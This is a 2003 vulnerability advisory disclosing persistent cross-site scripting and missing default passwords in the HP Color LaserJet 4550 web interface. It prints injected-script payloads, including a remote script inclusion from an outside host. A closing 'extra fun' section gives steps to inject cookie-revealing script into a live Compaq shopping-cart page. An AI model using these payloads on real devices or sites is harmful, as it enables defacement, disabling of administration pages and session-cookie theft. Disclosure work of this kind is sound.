------------------------------------------------------------------
          - EXPL-A-2003-018 exploitlabs.com Advisory 018
------------------------------------------------------------------
                  -= HP Color LaserJet 4550 =-




Donnie Werner
July 22, 2003
http://exploitlabs.com



Product:
--------
Hewlet Packard Color LaserJet 4550 ( possibly others )


Vunerability(s):
----------------
1. Remote Persistant Xss DoS
2. no default password


Description of product:
-----------------------
"Designed for business professionals who want
 to communicate more effectively using high-quality,
  professional - looking color documents" 




VUNERABILITY / EXPLOIT
======================

1. Remote Persistant Xss DoS
-------------------------------

The remote administration interface of the 
HP Color LaserJet 4550 uses extensive javascript in
building dynamic content for administration of the 
printers setup and manegment.

uhh oh..


Detail: by introducing XSS we render the remote interface useless...


Example 1.

Add Link:
 The HP allows an inclusion of a user definable link...



http://[printer-ip]/hp/device/this.LCDispatcher?update=html&cat=0&pos=0&submit=go
http://[printer-ip]/hp/device/this.LCDispatcher

as you can see the left hand menu has completly been rendered useless... ( sorry )


Device:
 LINKS:


when re-renderd we get weird out put depending on the JS used.. 
some examples..

http://<iframe%20src=/

" id="lnkOtherLink0" target="_blank">

http://[printer-ip]/hp/device/htt</font></a><br></p></div><div%20id=


looking at the source...

--------- snip -------------
}
document.writeln('<div id="navcap"><img border="0" src="images/button_bottom.gif" width="140" height="21"><BR>');
string = 'Other Links';
document.writeln('<p><b>' + string + '</b><br>');
tmpString = '<a target="_blank" href="this.LCLinkedPageImpl?LCLinkedPage=html&page=my_printer" id="lnkHardLink0"><font face="Helvetica,Arial,Gill Sans,Sans Serif" size="2">My Printer</font></a><br><a target="_blank" href="this.LCDispatcher?dispatch=html&page=order_supplies" id="lnkHardLink1"><font face="Helvetica,Arial,Gill Sans,Sans Serif" size="2">Order Supplies</font></a><br><a target="_blank" href="http://productfinder.support.hp.com/servlet/FindIt?q=[C7085A]&t=hp&s=x" id="lnkHardLink2"><font face="Helvetica,Arial,Gill Sans,Sans Serif" size="2">Solve A Problem</font></a><br>';
document.writeln(tmpString);
tmpString = '<a href="http://<script>alert("You are vunerable to xss - discover" id="lnkOtherLink0" target="_blank"><font face="Helvetica,Arial,Gill Sans,Sans Serif" size="2"><script>alert("Y</font></a><br>';
document.writeln(tmpString + '</p>');
document.writeln('</div>');
mapheight = navcaptop - topofbuttons;
document.writeln('<div id="navmap"><img border="0" src="images/spacer.gif" width="140" height="'+mapheight+'" usemap="#buttonsmap"></div>');
document.writeln('<MAP NAME="buttonsmap">');
for (var i=0; i < buttonarray.length; i++) {
document.writeln('<AREA SHAPE="rect" COORDS="'+buttonarray[i]['mapcoords']+'", HREF="'+buttonarray[i]['href']+'">');
}document.writeln('</MAP>');</script>
------- snip -------------

ouch!!


Example 2.

DIAGNOSTICS    
 Network Statistics  
 > Protocol Info  
 Test Page  

system contact and system location both vuln to..

<script language="JavaScript" src="http://www.astalavista.com/backend/news.js" type="text/javascript"></script>

which allows remote inclusion that is persistant

this  writes to the rom and is viewable even over snmp



I am assuming the only way to fix these issues
 are to upgrade the rom or reset via a CLI interface


2. no default password
-----------------------
if this was set this couldnt happen I guess.. ( oops again )



Local:
------
yes

Remote:
-------
yes

Vendor Fix:
-----------
No fix on 0day ( aww.. shucks )



Vendor Contact:
---------------
Concurrent with this advisory
support@hp.com
security@hp.com

Credits:
--------
Donnie Werner
morning_wood@exploitlabs.com
http://exploitlabs.com



===========================
EXTRA FUN WiTH HP / COMPAQ:
===========================

http://www.smb.compaq.com/dcart/cart.asp?oi=E9CED&BEID=19701&SBLID=

locate the "e-cupon" box
enter <script>document.write(document.cookie)</script>
press "Submit"
laugh "real hard"